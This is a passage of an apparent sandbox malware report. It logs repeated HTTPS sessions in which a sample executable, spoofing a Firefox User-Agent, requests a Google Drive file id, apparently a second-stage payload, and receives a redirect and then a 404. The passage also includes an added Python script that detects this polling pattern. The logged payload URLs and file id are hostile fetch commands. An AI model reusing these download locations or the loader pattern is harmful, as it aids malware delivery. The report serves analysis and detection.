                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:06:50 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC7dQE9ZmoXTY5c_KfSk0aHr0ZXPqHFBVuMQAfqu6FrtHKXwsgmKed4tHol8b7DsOSfG
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:06:49 GMT
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-D8mHoRdbOaOXCdzqSs6Dcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:06:50 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 5a 72 4a 5f 66 65 48 42 49 62 6e 64 77 68 6b 4f 75 4a 41 2d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QZrJ_feHBIbndwhkOuJA-g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 49932 | Destination IP: 172.217.19.174 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:02 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:02 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Security-Policy: script-src 'nonce-195avlmyn71xrxO0dy3RBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49940 | Destination IP: 142.250.181.1 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:04 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:05 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC69WkwGn1nrZNVaYLTEDd5enm01Ywf_-Uqvx6me1gA7QE2cqedW5q16lbOxgoqg5bJW
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:05 GMT
                                                Cross-Origin-Opener-Policy: same-origin
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce--VZf7RBcyyRT2cLW7twrKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:05 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 59 45 65 38 58 6e 76 4f 32 66 79 37 59 70 65 53 4b 4e 76 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uYEe8XnvO2fy7YpeSKNvEQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                Session ID: 12 | Source IP: 192.168.2.7 | Source Port: 49969 | Destination IP: 172.217.19.174 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:17 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:18 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:17 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy: script-src 'nonce-btGtKWTR1T9R_5IboO_tuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID: 13 | Source IP: 192.168.2.7 | Source Port: 49975 | Destination IP: 142.250.181.1 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:19 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:21 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC7F1E-Zh1ZL9IpsID0C0hWGFdKUkTFt7qdokeUhMYlZatP6iwdr3RuDDBgaMMnQxkWa
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:20 GMT
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy: script-src 'nonce-62BzG4TWsxQvIl69A0r0Sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Cross-Origin-Opener-Policy: same-origin
                                                Content-Length: 1652
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Content-Security-Policy: sandbox allow-scripts
                                                Connection: close
                                                2024-12-16 17:07:21 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 67 73 39 74 68 58 43 4d 6f 34 6c 63 4e 44 6b 6e 63 33 65 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kgs9thXCMo4lcNDknc3eUA">*{margin:0;padding:0}html,code{font:15px/22px arial
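The sessions above have one shape worth turning into detection logic: the sample process, which is not a browser, requests the same Google Drive file id with a Firefox User-Agent, follows the 303 to drive.usercontent.google.com, receives a 404 (the second-stage payload is no longer hosted at that id), and repeats the whole chain roughly every 15 seconds. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the sample. The record list is constructed by hand from the values visible in sessions 8 to 15, and the threshold names (min_attempts, max_gap_seconds) and the list of browser image names are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone

# Values copied from sessions 8-15 of this report; the record list itself is
# constructed by hand for the example and is not sandbox output.
FIREFOX_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) "
              "Gecko/20100101 Firefox/131.0")
PROCESS = r"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
FILE_ID = "13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3"


def rec(ts, host, path, status):
    """Build one request/response record; timestamps are UTC as in the report."""
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc),
        "host": host,
        "request": f"GET {path} HTTP/1.1",
        "status": status,
        "user_agent": FIREFOX_UA,
        "process": PROCESS,
    }


UC = f"/uc?export=download&id={FILE_ID}"
DL = f"/download?id={FILE_ID}&export=download"
SAMPLE = [  # constructed: entry point (303) followed by the redirect target (404)
    rec("2024-12-16 17:06:46", "drive.google.com", UC, 303),
    rec("2024-12-16 17:06:49", "drive.usercontent.google.com", DL, 404),
    rec("2024-12-16 17:07:02", "drive.google.com", UC, 303),
    rec("2024-12-16 17:07:04", "drive.usercontent.google.com", DL, 404),
    rec("2024-12-16 17:07:17", "drive.google.com", UC, 303),
    rec("2024-12-16 17:07:19", "drive.usercontent.google.com", DL, 404),
    rec("2024-12-16 17:07:33", "drive.google.com", UC, 303),
    rec("2024-12-16 17:07:36", "drive.usercontent.google.com", DL, 404),
]

ID_RE = re.compile(r"[?&]id=([A-Za-z0-9_-]+)")
# Assumed list of images that legitimately send a browser User-Agent.
BROWSER_IMAGES = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


def drive_file_id(request_line_or_url):
    """Extract the Google Drive file id from a request line, path or URL."""
    m = ID_RE.search(request_line_or_url)
    return m.group(1) if m else None


def ua_process_mismatch(user_agent, process_path):
    """A browser User-Agent sent by a non-browser image is the cheapest tell."""
    image = process_path.rsplit("\\", 1)[-1].lower()
    claims_browser = any(t in user_agent for t in ("Firefox/", "Chrome/", "Edg/"))
    return claims_browser and image not in BROWSER_IMAGES


def assess(records, min_attempts=3, max_gap_seconds=60):
    """Summarise repeated fetches of one Drive file id by one process.

    For each (process, file id) pair: how many times the entry point on
    drive.google.com was requested, the largest gap between those requests,
    whether any response in the chain was a 2xx, and a verdict. Thresholds
    are assumptions for the example.
    """
    by_key = defaultdict(list)
    for r in records:
        fid = drive_file_id(r["request"])
        if fid:
            by_key[(r["process"], fid)].append(r)

    out = {}
    for (process, fid), rs in by_key.items():
        rs.sort(key=lambda r: r["ts"])
        entry = [r["ts"] for r in rs if r["host"] == "drive.google.com"]
        gaps = [int((b - a).total_seconds()) for a, b in zip(entry, entry[1:])]
        succeeded = any(200 <= r["status"] < 300 for r in rs)
        out[(process, fid)] = {
            "attempts": len(entry),
            "max_gap_seconds": max(gaps) if gaps else None,
            "final_status": rs[-1]["status"],
            "succeeded": succeeded,
            "ua_mismatch": any(ua_process_mismatch(r["user_agent"], r["process"]) for r in rs),
            # Periodic re-requests of a dead payload link from a non-browser
            # image: the shape of a stage-1 loader whose stage 2 was taken down.
            "poll_loop": (len(entry) >= min_attempts and not succeeded
                          and bool(gaps) and max(gaps) <= max_gap_seconds),
        }
    return out


if __name__ == "__main__":
    for key, verdict in assess(SAMPLE).items():
        print(key, verdict)
```

The grouping key deliberately uses the file id rather than the full URL, so the entry-point request and the redirect target count as one chain; on live proxy logs the same function works over any records that carry timestamp, host, request line, status, User-Agent and originating image.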


                                                Session ID: 14 | Source IP: 192.168.2.7 | Source Port: 49986 | Destination IP: 172.217.19.174 | Destination Port: 443 | PID: 5064 | Process: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:33 UTC | 418 | OUT | GET /uc?export=download&id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3 HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:34 GMT
                                                Location: https://drive.usercontent.google.com/download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download
                                                Strict-Transport-Security: max-age=31536000
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Content-Security-Policy: script-src 'nonce-3Uk5rr6H0jZsMWkBbhTjJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.7 | 49987 | 142.250.181.14 | 443 | 5064 | C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 17:07:36 UTC | 460 | OUT | GET /download?id=13wRg_8Xhzr_sWcuFAXcTmEgMjQKIGEz3&export=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Cache-Control: no-cache
                                                Host: drive.usercontent.google.com
                                                Connection: Keep-Alive
                                                Cookie: NID=520=nxxPxm2W5Xf-aykbzj5oq-nHIKkwnWYS3_4aSh4Xgib2rIRIc7HHZs5IMg16Prb3ow1YhSv0aOFcQTEfkNGf-d-TBgBqjRREw9rErop35FthvCShFj7qlhk0r6LXclgzDss2lEamOb3a578OpzRwpBfA4_Q7YLFkEAY7U_hsvnCEb-YuYMKfy40W
                                                2024-12-16 17:07:37 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                X-GUploader-UploadID: AFiumC4lUVYmUhluXEdI1vkLA4mMAjB6bKsc1j-RUZ0hN61c68LyRrTPsZsbaDc12Qwrmhph
                                                Content-Type: text/html; charset=utf-8
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Mon, 16 Dec 2024 17:07:37 GMT
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Cross-Origin-Opener-Policy: same-origin
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Content-Security-Policy: script-src 'nonce-PDAiOeofzBXYm-xFOcPkEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
